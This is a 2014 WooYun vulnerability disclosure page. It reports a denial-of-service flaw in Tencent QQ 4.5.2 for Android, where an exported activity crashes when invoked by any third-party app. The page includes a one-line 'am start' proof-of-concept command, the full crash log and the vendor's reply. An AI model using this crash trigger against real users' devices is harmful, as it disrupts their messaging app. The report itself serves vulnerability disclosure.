当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-048176

漏洞标题:Tencent Messenger(QQ) Dos vulnerability(critical)

相关厂商:腾讯

漏洞作者: Pentest.mobi

提交时间:2014-01-07 15:54

修复时间:2014-04-04 15:55

公开时间:2014-04-04 15:55

漏洞类型:拒绝服务

危害等级:高

自评Rank:16

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-01-07: 细节已通知厂商并且等待厂商处理中
2014-01-08: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-03-04: 细节向核心白帽子及相关领域专家公开
2014-03-14: 细节向普通白帽子公开
2014-03-24: 细节向实习白帽子公开
2014-04-04: 细节向公众公开

简要描述:

Tencent Messenger(QQ) Version: 4.5.2 critical Dos vulnerability need to be handled.

详细说明:

com.tencent.mobileqq.activity.QQBrowserDelegationActivity这个activity组件可被任意第三方程序调用导致进程crash.
Process Name: com.tencent.mobileqq
Version: 4.5.2
问题包:http://pan.baidu.com/s/1lEFzo
poc:
am start -n com.tencent.mobileqq/com.tencent.mobileqq.activity.QQBrowserDelegationActivity
crash log:

E/AndroidRuntime( 2420): java.lang.RuntimeException: Unable to start activity ComponentInfo{com.tencent.mobileqq/com.tencent.mobileqq.activity.QQBrowserDelegationActivity}: java.lang.NullPointerException: uriString
E/AndroidRuntime( 2420):     at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:1955)
E/AndroidRuntime( 2420):     at android.app.ActivityThread.handleLaunchActivity(ActivityThread.java:1980)
E/AndroidRuntime( 2420):     at android.app.ActivityThread.access$600(ActivityThread.java:122)
E/AndroidRuntime( 2420):     at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1146)
E/AndroidRuntime( 2420):     at android.os.Handler.dispatchMessage(Handler.java:99)
E/AndroidRuntime( 2420):     at android.os.Looper.loop(Looper.java:137)
E/AndroidRuntime( 2420):     at android.app.ActivityThread.main(ActivityThread.java:4340)
E/AndroidRuntime( 2420):     at java.lang.reflect.Method.invokeNative(Native Method)
E/AndroidRuntime( 2420):     at java.lang.reflect.Method.invoke(Method.java:511)
E/AndroidRuntime( 2420):     at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:784)
E/AndroidRuntime( 2420):     at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:551)
E/AndroidRuntime( 2420):     at dalvik.system.NativeStart.main(Native Method)
E/AndroidRuntime( 2420): Caused by: java.lang.NullPointerException: uriString
E/AndroidRuntime( 2420):     at android.net.Uri$StringUri.<init>(Uri.java:464)
E/AndroidRuntime( 2420):     at android.net.Uri$StringUri.<init>(Uri.java:454)
E/AndroidRuntime( 2420):     at android.net.Uri.parse(Uri.java:426)
E/AndroidRuntime( 2420):     at com.tencent.mtt.spcialcall.sdk.MttApi.loadUrlInMbWnd(MttApi.java:68)
E/AndroidRuntime( 2420):     at com.tencent.mobileqq.activity.QQBrowserDelegationActivity.a(ProGuard:264)
E/AndroidRuntime( 2420):     at com.tencent.mobileqq.activity.QQBrowserDelegationActivity.b(ProGuard:448)
E/AndroidRuntime( 2420):     at com.tencent.mobileqq.activity.QQBrowserDelegationActivity.onCreate(ProGuard:99)
E/AndroidRuntime( 2420):     at android.app.Activity.performCreate(Activity.java:4465)
E/AndroidRuntime( 2420):     at android.app.Instrumentation.callActivityOnCreate(Instrumentation.java:1049)
E/AndroidRuntime( 2420):     at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:1919)
E/AndroidRuntime( 2420):     ... 11 more
W/ActivityManager(   78):   Force finishing activity com.tencent.mobileqq/.activity.QQBrowserDelegationActivity
W/InputManagerService(   78): Window already focused, ignoring focus gain of: com.android.internal.view.IInputMethodClient$Stub$Proxy@41603f58
W/ThrottleService(   78): unable to find stats for iface rmnet0
I/WindowManager(   78): createSurface Window{414395e0  paused=false}: DRAW NOW PENDING
D/dalvikvm( 2420): GC_CONCURRENT freed 754K, 7% free 12872K/13767K, paused 4ms+17ms
W/ActivityManager(   78): Activity pause timeout for ActivityRecord{41b8a678 com.tencent.mobileqq/.activity.QQBrowserDelegationActivity}
W/NetworkManagementSocketTagger(   78): setKernelCountSet(10035, 0) failed with errno -2
D/dalvikvm( 2420): GC_CONCURRENT freed 727K, 6% free 13146K/13959K, paused 4ms+4ms
E/MSF.S.AppProcessManager( 2118): [E]can not find com.tencent.mobileqq to receive msg to:null from:FromServiceMsg msName:onRecvPushMsg ssoSeq:711488865 failCode:1000 errorMsg: uin:187224929 serviceCmd:OnlinePush.PbPushGroupMsg appId:-1 appSeq:711488865
E/MSF.S.AppProcessManager( 2118): [E]can not find com.tencent.mobileqq to receive msg to:null from:FromServiceMsg msName:onRecvPushMsg ssoSeq:711489146 failCode:1000 errorMsg: uin:187224929 serviceCmd:OnlinePush.PbPushGroupMsg appId:-1 appSeq:711489146
E/MSF.S.AppProcessManager( 2118): [E]can not find com.tencent.mobileqq to receive msg to:null from:FromServiceMsg msName:onRecvPushMsg ssoSeq:711502275 failCode:1000 errorMsg: uin:187224929 serviceCmd:OnlinePush.PbPushGroupMsg appId:-1 appSeq:711502275
W/ActivityManager(   78): Activity destroy timeout for ActivityRecord{41b8a678 com.tencent.mobileqq/.activity.QQBrowserDelegationActivity}
W/ActivityManager(   78): Timeout executing service: ServiceRecord{41a68a38 com.tencent.mobileqq/.app.GuardService}
I/ActivityManager(   78): Crashing app skipping ANR: ProcessRecord{4145d828 2420:com.tencent.mobileqq/10035} Executing service com.tencent.mobileqq/.app.GuardService

漏洞证明:

DOS-QQ1.jpg


DOS-QQ2.jpg

修复方案:

版权声明:转载请注明来源 Pentest.mobi@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-04-04 15:55

厂商回复:

非常感谢您的报告,新版本已不存在报告中问题,感谢对腾讯业务的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

最新状态:

暂无